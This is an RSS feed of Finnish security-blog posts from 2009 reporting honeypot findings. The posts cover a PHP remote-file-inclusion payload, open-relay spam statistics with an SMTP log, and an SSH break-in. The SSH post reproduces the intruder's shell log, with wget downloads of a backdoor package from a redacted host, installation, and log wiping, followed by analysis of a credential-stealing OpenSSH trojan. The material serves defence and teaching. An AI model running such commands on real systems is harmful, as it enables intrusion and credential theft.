<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Tietoturvablogi &#187; Tunkeilijat</title>
	<atom:link href="http://www.fitsec.com/blogi/category/tunkeilijat/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.fitsec.com/blogi</link>
	<description>Suomalaista tietoturvaa</description>
	<lastBuildDate>Fri, 25 Sep 2009 20:26:19 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Tunkeilijat: Websivuston hyväksikäyttö</title>
		<link>http://www.fitsec.com/blogi/2009/09/25/tunkeilijat-websivuston-hyvaksikaytto/</link>
		<comments>http://www.fitsec.com/blogi/2009/09/25/tunkeilijat-websivuston-hyvaksikaytto/#comments</comments>
		<pubDate>Fri, 25 Sep 2009 20:26:19 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Tietoturva]]></category>
		<category><![CDATA[Tunkeilijat]]></category>

		<guid isPermaLink="false">http://www.fitsec.com/blogi/?p=45</guid>
		<description><![CDATA[Päätimme katsoa hieman tarkemmin sivustoillemme kohdistuvia hyväksikäyttöyrityksiä joita tulee useita päivittäin. Normaalien SQL-injektiohyökkäysten lisäksi näemme useimmiten myös PHP-kielellä kirjoitettuihin web-ohjelmistoihin kohdistuvia RFI-hyökkäyksiä.
Jätämme tästä esimerkistä pois tarkan URLin, jota hyökkääjä kokeili, mutta yleisellä tasolla todettakoon että hyökkääjä yritti etsiä haavoittuvaa PHPAdsNew-asennusta.
Latasimme hyökkääjän lähettämästä osoitteesta itse hyökkäyksessä käytetyn tiedoston:

Ylläolevasta kuvasta näkee suhteellisen helposti että kyseessä BASE64-koodattu tiedosto, [...]]]></description>
			<content:encoded><![CDATA[<p>Päätimme katsoa hieman tarkemmin sivustoillemme kohdistuvia hyväksikäyttöyrityksiä joita tulee useita päivittäin. Normaalien SQL-injektiohyökkäysten lisäksi näemme useimmiten myös PHP-kielellä kirjoitettuihin web-ohjelmistoihin kohdistuvia RFI-hyökkäyksiä.</p>
<p>Jätämme tästä esimerkistä pois tarkan URLin, jota hyökkääjä kokeili, mutta yleisellä tasolla todettakoon että hyökkääjä yritti etsiä haavoittuvaa PHPAdsNew-asennusta.</p>
<p>Latasimme hyökkääjän lähettämästä osoitteesta itse hyökkäyksessä käytetyn tiedoston:</p>
<p><a href="http://www.fitsec.com/wpe/wp-content/uploads/2009/09/cpr.png"><img title="RFI exploit" src="http://www.fitsec.com/wpe/wp-content/uploads/2009/09/cpr.png" alt="RFI exploit" width="464" height="170" /></a></p>
<p>Ylläolevasta kuvasta näkee suhteellisen helposti että kyseessä BASE64-koodattu tiedosto, joka dekoodauksen jälkeen suoritetaan normaalisti eval()-funktion avulla. Alla olevassa kuvassa on dekoodauksen jälkeen näkyville tuleva hyökkäyskoodi:</p>
<p><a href="http://www.fitsec.com/wpe/wp-content/uploads/2009/09/base64decoded.png"><img title="base64decoded" src="http://www.fitsec.com/wpe/wp-content/uploads/2009/09/base64decoded.png" alt="base64decoded" width="684" height="136" /></a></p>
<p>Kuten huomaamme, koodi sisältä vielä pienen pätkän BASE64-koodattua tietoa, mutta katsotaan ensin mitä hyökkäyskoodi tekee yleisellä tasolla. Hyökkäyskoodi kerää muutamia hyödyllisiä tietoja PHP-ympäristön muuttujista kuten palvelimen nimen ja tiedon siitä onko PHP:n &#8220;Safe Mode&#8221; aktivoitu vai ei. Nämä tiedot, kuten myös hyväksikäytetyn osoitteen hyökkäyskoodi lähettää sähköpostilla eteenpäin. Vastaanottajan osoite on jäljellä olevassa BASE64-koodatussa tekstinpätkässä:</p>
<p>fr33sh3ll@gmail.com</p>
<p>Joka kerta kun hyökkäyskoodi onnistutaan ajamaan kohdekoneessa saa koodin tekijä sähköpostilla ilmoituksen joka sisältää haavoittuvan palvelimen osoitteen ja tarkan URL-osoitteen haavoittuvaan PHPAdsNew-asennukseen. Tällä tavoin hyökkääjä voi myöhemmin halutessaan käyttää haavoittuvuutta uudelleen hyväkseen ja ajaa kohdekoneessa haluamaansa koodia.</p>
<p>On olemassa useita hyviksi havaittuja ja suositeltuja keinoja hankaloittaa tällaisten hyökkäysten toimintaa kuten asettamalla PHP-tulkissa &#8220;Safe Mode&#8221; vaihtoehto päälle, tai ottaa allow_url_open tai allow_url_include (riippuu käytössä olevan PHP-kielen versiosta) pois päältä. Enemmän hyviä ohjeita ja vinkkejä PHP-asennusten koventamiseen löytyy esimerkiksi näiltä sivuilta:</p>
<p>There are several ways to make such attacks much harder to perform, like turning on the safe mode or toggling off the allow_url_fopen or allow_url_include (in some versions of php). More good/better tricks can be found for example on these two sites:</p>
<p><a href="http://www.madirish.net/?article=229" target="_blank">http://www.madirish.net/?article=229</a></p>
<p><a href="http://www.hardened-php.net/" target="_blank">http://www.hardened-php.net/</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.fitsec.com/blogi/2009/09/25/tunkeilijat-websivuston-hyvaksikaytto/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tunkeilijat: Päivitys roskapostikirjoitukseen</title>
		<link>http://www.fitsec.com/blogi/2009/05/10/tunkeilijat-paivitys-roskapostikirjoitukseen/</link>
		<comments>http://www.fitsec.com/blogi/2009/05/10/tunkeilijat-paivitys-roskapostikirjoitukseen/#comments</comments>
		<pubDate>Sun, 10 May 2009 07:22:16 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Roskaposti]]></category>
		<category><![CDATA[Tunkeilijat]]></category>

		<guid isPermaLink="false">http://www.fitsec.com/blogi/?p=39</guid>
		<description><![CDATA[Noin viikko sitten kirjoitimme hunajapurkimme tuottamasta roskapostidatasta. Ensimmäisen kolmen tunnin aikana vastaanotetun datan määrä oli suhteellisen pieni: roskapostiviestien vastaanottajien lukumäärä oli noin 12000.
Nyt noin viikko hunajapurkin vastaanottamien ensimmäisten roskapostiviestin jälkeen palasimme tarkistamaan tilatot. Huomasimme kuluneen viikon aikana että ensimmäisen hunajapurkkiin osuneen roskapostittajan lisäksi hunajapurkkiin lähetti roskapostia myös noin 2000 saastuneen koneen vahvuinen bottiverkko.
Tässä hieman päivitettyjä [...]]]></description>
			<content:encoded><![CDATA[<p>Noin viikko sitten kirjoitimme hunajapurkimme tuottamasta roskapostidatasta. Ensimmäisen kolmen tunnin aikana vastaanotetun datan määrä oli suhteellisen pieni: roskapostiviestien vastaanottajien lukumäärä oli noin 12000.<span id="more-39"></span></p>
<p>Nyt noin viikko hunajapurkin vastaanottamien ensimmäisten roskapostiviestin jälkeen palasimme tarkistamaan tilatot. Huomasimme kuluneen viikon aikana että ensimmäisen hunajapurkkiin osuneen roskapostittajan lisäksi hunajapurkkiin lähetti roskapostia myös noin 2000 saastuneen koneen vahvuinen bottiverkko.</p>
<p>Tässä hieman päivitettyjä tilastoja viikon ajalta:</p>
<p>Vastaanotimme 309202 roskapostia jotka oli tarkoitettu 3814594 vastaanottajalle, eli käytännössä onnistuimme tutkimuksen yhteydessä estämään 3.8 miljoonan roskapostin välityksen. Taiwanissa sijaitsevien vastaanottajien määrä oli edelleen korkea: 3.8 miljoonasta vastaanottajasta 3.5 miljoonalla oli .tw -päätteinen sähköpostiosoite.</p>
<p>Alla neljä kuvaruutukaappausta tyypillisistä näillä roskaposteilla mainostetuista tuotteista:</p>
<p><a href="http://www.fitsec.com/wpe/wp-content/uploads/2009/05/spam1.jpg"><img class="aligncenter size-full wp-image-61" title="DVD spam" src="http://www.fitsec.com/wpe/wp-content/uploads/2009/05/spam1.jpg" alt="DVD spam" width="560" height="425" /></a></p>
<p><a href="http://www.fitsec.com/wpe/wp-content/uploads/2009/05/spam2.jpg"><img class="aligncenter size-full wp-image-64" title="Spam" src="http://www.fitsec.com/wpe/wp-content/uploads/2009/05/spam2.jpg" alt="Spam" width="710" height="905" /></a></p>
<p><a href="http://www.fitsec.com/wpe/wp-content/uploads/2009/05/spam3.jpg"><img class="aligncenter size-full wp-image-65" title="Food Spam" src="http://www.fitsec.com/wpe/wp-content/uploads/2009/05/spam3.jpg" alt="Food Spam" width="750" height="720" /></a></p>
<p><a href="http://www.fitsec.com/wpe/wp-content/uploads/2009/05/spam4.jpg"><img class="aligncenter size-full wp-image-66" title="Spam 4" src="http://www.fitsec.com/wpe/wp-content/uploads/2009/05/spam4.jpg" alt="Spam 4" width="766" height="705" /></a></p>
<p>Näyttäisi siltä että VideoCD:t (VCD) ovat erittäin suosittuja roskapostiaiheita aasiassa. Emme kuluneen viikon aikana kertaakaan havainnoineet länsimaissa tuttuja aiheita kuten viagraa tai jäljennöskelloja tarjoavia roskaposteja.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.fitsec.com/blogi/2009/05/10/tunkeilijat-paivitys-roskapostikirjoitukseen/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tunkeilijat: Roskapostia</title>
		<link>http://www.fitsec.com/blogi/2009/05/02/tunkeilijat-roskapostia/</link>
		<comments>http://www.fitsec.com/blogi/2009/05/02/tunkeilijat-roskapostia/#comments</comments>
		<pubDate>Sat, 02 May 2009 19:36:31 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Roskaposti]]></category>
		<category><![CDATA[Tunkeilijat]]></category>

		<guid isPermaLink="false">http://www.fitsec.com/blogi/?p=32</guid>
		<description><![CDATA[Tunkeilijat sarjamme tämänkertainen esimerkki näyttää miten käy jos SMTP (sähköpostipalvelin) on asennettu väärin.

Rakensimme tätä tarkoitusta varten hunajapurkin, joka näyttäytyy ulkopuolisille hyökkääjille avoimena välityspalvelimena. Asennuksen jälkeen jouduimme odottamaan noin vuorokauden verran ennen ensimmäisen roskapostittajan saapumista. Ensimmäinen palvelimelle lähetetty viesti ei ollut vielä roskapostia vaan roskapostittajan itselleen lähettämä viesti, jolla he pyrkivät selvittämään onko palvelin oikeasti avoi [...]]]></description>
			<content:encoded><![CDATA[<p>Tunkeilijat sarjamme tämänkertainen esimerkki näyttää miten käy jos SMTP (sähköpostipalvelin) on asennettu väärin.</p>
<p><span id="more-32"></span></p>
<p>Rakensimme tätä tarkoitusta varten hunajapurkin, joka näyttäytyy ulkopuolisille hyökkääjille avoimena välityspalvelimena. Asennuksen jälkeen jouduimme odottamaan noin vuorokauden verran ennen ensimmäisen roskapostittajan saapumista. Ensimmäinen palvelimelle lähetetty viesti ei ollut vielä roskapostia vaan roskapostittajan itselleen lähettämä viesti, jolla he pyrkivät selvittämään onko palvelin oikeasti avoi välityspalvelin. Avoin välityspalvelin sallii sähköpostin välittämisen sellaisiinkin osoitteisiin jotka eivät suoranaisesti kuulu sen toimipiiriin. Tämän takia mustalle listalle joutuu kyseinen välityspalvelin roskapostin takia, eikä poskapostittajien omat järjestelmät.</p>
<p>Ensimmäinen testiviesti näytti tältä:</p>
<p><em>OUT:       220 &lt;removed&gt; SMTP server ready to serve.<br />
IN :       HELO &lt;removed&gt;<br />
OUT:       250 &lt;removed&gt; Hello &lt;removed&gt;, pleased to meet you.<br />
IN :       MAIL FROM:&lt;k6u5f3s2k5@yahoo.com&gt;<br />
OUT:       250 OK<br />
IN :       RCPT TO:&lt;sseenndd1201@yahoo.com.hk&gt;<br />
OUT:       250 User not local; will forward<br />
IN :       DATA<br />
OUT:       354 Start mail input; end with &lt;CRLF&gt;.&lt;CRLF&gt;<br />
IN :       Subject: Super webscan open relay check succeded, hostname = &lt;removed&gt;<br />
IN :       .<br />
OUT:       250 OK<br />
IN :       QUIT</em></p>
<p>Koska roskapostittajat eivät luota suoraan palvelimen antamaan lupaukseen välittää viesti jouduimme tämän ensimmäisen koeviestin välittää itse käsin eteenpäin roskapostittajalle, jotta saimme palvelimen näyttämään oikealta välityspalvelimelta. Emme kuitenkaan missään vaiheessa salli viestien automaattista välittämistä, koska silloin myös roskapostit voivat päästä läpi. Ensimmäisen testiviestin välittämisen jälkeen kului ainoastaan 10 minuuttia siihen, että hunajapurkkiimme alkoi virtaamaan oikeata roskapostia jota roskapostittaja yritti saada välitetyksi uhreille.</p>
<p>Kiinnostava yksityiskohtana mainittakoon että kaikki näiden kyseisten roskapostien vastaanottajat sijaitsevat Taiwanissa. Alla joitain tilastoja roskapostiaallon ensimmäiseltä kolmelta tunnilta:</p>
<p>Kaikkiaan kolmen tunnin aikana vastaanotimme 1008 roskapostia jotka oli yritetty lähettää 12877 vastaanottajalle. Keskimäärin yhdeläl roskapostilla oli noin 13 vastaanottajaa. Eristimme roskaposteista yhteensä 990 uniikkia URL-osoitetta, joka osoittivat joko roskapostilla mainostettuun sivustoon taikka viestin runkoon liitettyyn kuvaan.</p>
<p>Yllämainituista 990 URL-osoitteesta eristimme 878 yksilöllistä DNS RR -tunnistetta (domain-osoitetta).</p>
<p>Kaikki vastaanotetut viestit oli kirjoitettu kiinaksi. Valitsimme satunnaisotannalla yhden roskapostin tarkastelun kohteeksi jotta näimme minkätyyppisistä viesteistä on kyse. Kävimme viestissä olleessa URLissa ja näimme tämän:</p>
<p><img class="aligncenter size-full wp-image-52" title="Spamvertized site" src="http://www.fitsec.com/wpe/wp-content/uploads/2009/05/spam_dest.png" alt="Spamvertized site" width="624" height="706" /></p>
<p>Kyseessä on Video CD-levyjä tarjoava sivusto. Arvasimme aluksi että kyseiseltä sivustolta olisi mahdollisesti myyty piraattielokuvia tai vastaavia, mutta käänsimme sivuston silti Googlen käännöskoneen avulla:</p>
<p>&#8220;<span style="background-color: #e6ecf9;" onmouseover="_tipon(this)" onmouseout="_tipoff()"><span style="letter-spacing: 2px;">Genuine boxed <span style="color: #ff0000;">VCD</span> attached <span style="color: #ff0000;"><strong>12</strong> teaching manual</span></span></span>&#8221;</p>
<p>Otsikon perusteella sivusto tarjoaa erinäköisiä opetusvideoita. Siltä varalta, että Google olisi tehnyt virheen otsikon käännöksessä käännätytimme koko sivuston:</p>
<p><span onmouseover="_tipon(this)" onmouseout="_tipoff()"><span style="color: #0000ff;">VCD1. Received the court summons, notices, judgments,</span> etc. <span style="color: #0000ff;">The first time, how to deal with?</span></span><br />
<span onmouseover="_tipon(this)" onmouseout="_tipoff()"><span style="color: #ff0000;">VCD2. Improper financial management刷爆cards,</span> and <span style="color: #ff0000;">owe to be debt, card slave how to do?</span></span><br />
<span onmouseover="_tipon(this)" onmouseout="_tipoff()">VCD3. Civil unions should pay attention to, it will have to do? Owe not yet been fraud, how to recover the money was owed?</span><br />
<span onmouseover="_tipon(this)" onmouseout="_tipoff()"><span style="color: #008000;">VCD4. On housing transactions, leasing matters Particular attention should be paid, they can not get the rent or a tenant refusing to move out, how to do?</span></span><br />
<span onmouseover="_tipon(this)" onmouseout="_tipoff()"><span style="color: #800000;">VCD5. Relating to marriage, divorce, adoption, unclaimed, custody, alimony should pay attention to?</span></span><br />
<span onmouseover="_tipon(this)" onmouseout="_tipoff()"><span style="color: #808000;">VCD6. Related to cases involved in an accident the attention vehicle damage insurance claims, injury claims</span></span><br />
<span onmouseover="_tipon(this)" onmouseout="_tipoff()"><span style="color: #0000ff;">VCD7. On the identity card (original copy) used by Notes? Related instruments (promissory notes, checks) of the relevant laws, lost applications,</span></span> <span onmouseover="_tipon(this)" onmouseout="_tipoff()"> <span style="color: #0000ff;">Movements, invasion and occupation?</span></span><br />
<span onmouseover="_tipon(this)" onmouseout="_tipoff()"><span style="color: #ff0000;">VCD8. What circumstances a lawyer must be the best? Resolve their legal problems in three steps</span></span><br />
<span onmouseover="_tipon(this)" onmouseout="_tipoff()">VCD9. Bureau of Investigation by the police or interviews, the transcripts for which we should pay attention right?</span><br />
<span onmouseover="_tipon(this)" onmouseout="_tipoff()"><span style="color: #008000;">VCD10. Books on various reconciliation, cut knot book, undertaking contract, agreement, letter of the law?</span></span><br />
<span onmouseover="_tipon(this)" onmouseout="_tipoff()"><span style="color: #800000;">VCD11. Husband and wife quarrel, family disputes or domestic violence should be how to deal with?</span></span><br />
<span onmouseover="_tipon(this)" onmouseout="_tipoff()"><span style="color: #808000;">VCD12. Relating to a variety of writing a will, inheritance of the relevant laws? How to make the best use of the township, the city of the functions of the mediation?</span></span></p>
<p>Emme ole nähneet aikaisemmin ylläolevan kaltaisia roskaposteja mutta kyseessä on ilmeisesti kulttuuriero Euroopan ja Aasian välillä. Jatkamme hunajapurkin seuraamista jatkossakin ja julkaisemme lisää tilastoja.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.fitsec.com/blogi/2009/05/02/tunkeilijat-roskapostia/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tunkeilijat: Heikolla salasanalla suojatun SSH-yhteyden hyväksikäyttö</title>
		<link>http://www.fitsec.com/blogi/2009/04/05/tunkeilijat-heikolla-salasanalla-suojatun-ssh-yhteyden-hyvaksikaytto/</link>
		<comments>http://www.fitsec.com/blogi/2009/04/05/tunkeilijat-heikolla-salasanalla-suojatun-ssh-yhteyden-hyvaksikaytto/#comments</comments>
		<pubDate>Sun, 05 Apr 2009 19:42:27 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Tunkeilijat]]></category>
		<category><![CDATA[hyväksikäyttö]]></category>
		<category><![CDATA[openssh]]></category>
		<category><![CDATA[ssh]]></category>

		<guid isPermaLink="false">http://www.fitsec.com/blogi/?p=20</guid>
		<description><![CDATA[Sarjan aloittaa esimerkki SSH-yhteyden hyväksikäytöstä. Pystytimme Linux-palvelimen joka oli tarkoituksella asennettu siten, että järjestelmään pääsi suoraan kirjautumaan ylläpitäjän root-tunnuksilla SSH-yhteyden yli. Käyttäjätunnuksen salasana oli myös tarkoituksella asetettu sellaiseksi että se on murrettavissa kohtalaisella yrityksellä.
Jouduimme odottamaan hyökkääjän saapumista muutaman tunnin ajan järjestelmän aktivoimisesta. Alla hyökkääjän komentoloki, josta olemme piilottaneet ip- ja verkko-osoitteista osan tarkoituksella.
w
cat /etc/passwd
cat /proc/cpuinfo
ls
wget [...]]]></description>
			<content:encoded><![CDATA[<p>Sarjan aloittaa esimerkki SSH-yhteyden hyväksikäytöstä. Pystytimme Linux-palvelimen joka oli tarkoituksella asennettu siten, että järjestelmään pääsi suoraan kirjautumaan ylläpitäjän root-tunnuksilla SSH-yhteyden yli. Käyttäjätunnuksen salasana oli myös tarkoituksella asetettu sellaiseksi että se on murrettavissa kohtalaisella yrityksellä.<span id="more-20"></span></p>
<p>Jouduimme odottamaan hyökkääjän saapumista muutaman tunnin ajan järjestelmän aktivoimisesta. Alla hyökkääjän komentoloki, josta olemme piilottaneet ip- ja verkko-osoitteista osan tarkoituksella.</p>
<p style="padding-left: 30px;">w<br />
cat /etc/passwd<br />
cat /proc/cpuinfo<br />
ls<br />
wget &lt;poistettu&gt;.com/i[BS]sirsky/bkd<br />
tar xzvf bkd<br />
cd ./&#8211;/<br />
./inst<br />
ls<br />
mv zap /bin<br />
cd ..<br />
rm -rf bkd<br />
rm -rf ./&#8211;/<br />
ls<br />
w<br />
zap &lt;ip.ip.ip.ip&gt;.d<br />
w<br />
ls<br />
ls<br />
cat /etc/hosts<br />
w<br />
ls<br />
ls -a<br />
wget &lt;poistettu&gt;.com/sirsky/code.tgz<br />
tar xzvf code.jpg<br />
[U-ARROW][BS][BS][BS]tgz<br />
cd .n<br />
./start da[BS][BS]adware<br />
cd ..<br />
rm -rf code.tgz<br />
w</p>
<p>Muutamissa komennoissa olleista kirjoitusvirheistä päätellen hyökkääjänä on tällä kerralla ollut ihminen automaattisesti toimivan ohjelman sijaan. Huomionarvoista on myös &#8216;w&#8217;-komennon (&#8216;who&#8217;, näyttää järjestelmään sisäänkirjautuneena olevat käyttäjät) tiuha käyttäminen. Hyökkääjä olisi todennäköisesti lopettanut hyökkäyksen kesken jos olisi havainnut toisia käyttäjiä järjestelmässä.</p>
<p>Hyökkääjä on ensin tarkistanut järjestelmään rekisteröityjen käyttäjien listan /etc/passwd tiedostosta, jonka jälkeen hyökkääjä katsoi koneen prosessorin tiedot. Tämän jälkeen hyökkääjä latasi ulkopuolisesta verkkosoitteesta bkd-nimisen paketin, josta lisää alempana.</p>
<p>Paketin asentamisen jälkeen hyökkääjä poisti paketin lähdekoodit ja tämän lisäksi paketin mukana tulleella &#8216;zap&#8217;-ohjelmalla hyökkääjä poisti käyttöjärjestelmän lokeista kaikki tiedot joissa näkyi hänen käyttämänsä IP-osoite.</p>
<p>Seuraavaksi hyökkääjä tarkisti /etc/hosts-tiedoston ilmeisesti siltä varalta että hyväksikäytetty kone olisi sisäverkossa, jolloin hosts-tiedoston sisältö olisi mahdollisesti paljastanut muita hyväksikäytettäviä koneita sisäverkossa.</p>
<p>Tämän jälkeen hyökkääjä latasi samasta ulkopuolisesta verkko-osoitteesta code.tgz-nimisen paketin josta myös alempana lisää. Paketin asentamisen ja aktivoinnin jälkeen hyökkääjä poisti paketin lähdekoodit järjestelmästä. Tässä vaiheessa päätimme että olimme keränneet tarpeeksi dataa ja suljimme hyökkääjän käyttämän etäyhteyden ja irroitimme koneemme verkosta tutkimuksia varten.</p>
<p>Hyökkääjän ensimmäisenä lataama bkd-niminen paketti oli openSSH-ohjelmiston versio, jonne hyökkääjä oli ujuttanut omaa koodiaan mukaan. Hyökkääjä oli muokannut openSSH-ohjelmistoa siten, että se lähettää muiden käyttäjien sisäänkirjautuessa järjestelmään käyttäjien tunnus/salasana -parit sähköpostilla hyökkääjälle. Näitä tunnuksia käyttäen hyökkääjä voi yrittää murtautua myös muihin tietojärjestelmiin. Koodissa oleva takaovi myös takaa hyökkääjälle pääsyn järjestelmään vaikka tietojärjestelmän pääkäyttäjän salasana vaihdettaisiin.</p>
<p>Hyökkääjän toisena lataama paketti on muokattu kopio EnergyMech IRC-botista. Tämän avulla hyökkääjä voi helposti ajaa komentoja hyväksikäytetyssä järjestelmässä IRC-protokollan yli. IRC-botti oli asetettu liittymään tunnetussa julkisessa IRC-verkossa olevalle kanavalle. Kanavalla oli 12 muuta hyväksikäytettyä linux-palvelinta, joista on lähetetty asianosaisille abuse-viestit järjestelmien turvaamista varten.</p>
<p>Jäljitimme hyökkääjän Romaniassa sijaitsevaan kaupunkiin. Löysimme myös muuta dataa jolla hyökkääjä voidaan viranomaisten puolelta tunnistaa, ja nämä tiedot on lähetty Romanian viranomaisille tutkittavaksi. Valitettavasti hyökkääjän tunnistaminen ei kaikissa tapauksissa ole aina mahdollista.</p>
<p>Jatkamme Tunkeilijat-sarjaa tulevaisuudessa, ja pyrimme esittelemään ylläolevan kaltaisia tapauksia enemmänkin.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.fitsec.com/blogi/2009/04/05/tunkeilijat-heikolla-salasanalla-suojatun-ssh-yhteyden-hyvaksikaytto/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Uusi aihepiiri lisätty</title>
		<link>http://www.fitsec.com/blogi/2009/04/05/uusi-aihepiiri-lisatty/</link>
		<comments>http://www.fitsec.com/blogi/2009/04/05/uusi-aihepiiri-lisatty/#comments</comments>
		<pubDate>Sun, 05 Apr 2009 18:08:16 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Tietoturva]]></category>
		<category><![CDATA[Tunkeilijat]]></category>

		<guid isPermaLink="false">http://www.fitsec.com/blogi/?p=13</guid>
		<description><![CDATA[Aloitamme uuden aihepiirin blogissamme. Tunkeilijat-osiossa käymme läpi erilaisia internetissä esiintyviä hyökkäyksiä, ja pyrimme esittämään niistä esimerkkejä oikeasta elämästä. Erilaisia hyväksikäytön kohteena olevia tietojärjestelmien palveluita on lukemattomia. Näitä myös käytetään varsin erilaisiin käyttötarkoituksiin, milloin haittaohjelmien levittämiseen ja milloin taas esimerkiksi roskapostin lähettämiseen. Tämän aihepiirin alle kirjoitetuissa entryissä on tarkoituksena käydä läpi erilaisia hyväksikäyttömekanismeja ja sen lisäksi [...]]]></description>
			<content:encoded><![CDATA[<p>Aloitamme uuden aihepiirin blogissamme. Tunkeilijat-osiossa käymme läpi erilaisia internetissä esiintyviä hyökkäyksiä, ja pyrimme esittämään niistä esimerkkejä oikeasta elämästä. <span id="more-13"></span>Erilaisia hyväksikäytön kohteena olevia tietojärjestelmien palveluita on lukemattomia. Näitä myös käytetään varsin erilaisiin käyttötarkoituksiin, milloin haittaohjelmien levittämiseen ja milloin taas esimerkiksi roskapostin lähettämiseen. Tämän aihepiirin alle kirjoitetuissa entryissä on tarkoituksena käydä läpi erilaisia hyväksikäyttömekanismeja ja sen lisäksi tarkastella, mitä oikeat hyökkääjät tekevät järjestelmille joihin he ovat luvatta päässeet sisälle.</p>
<p>Aineistot kerätään oikeilta, ainoastaan tätä tarkoitusta varten pystytetyiltä koneilta jotka ovat ainoastaan kyseisen testin ajan toiminnassa ja jatkuvan valvonnan alaisena. Näin voidaan varmistua siitä ettei hyökkääjät pääse käyttämään järjestelmiämme hyväksi muiden tietokoneiden saastuttamisessa.</p>
<p>Käyttämämme tietojärjestelmät on rakennettu siten, ettei hyökkääjä voi havaita olevansa tarkkailun alla.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.fitsec.com/blogi/2009/04/05/uusi-aihepiiri-lisatty/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
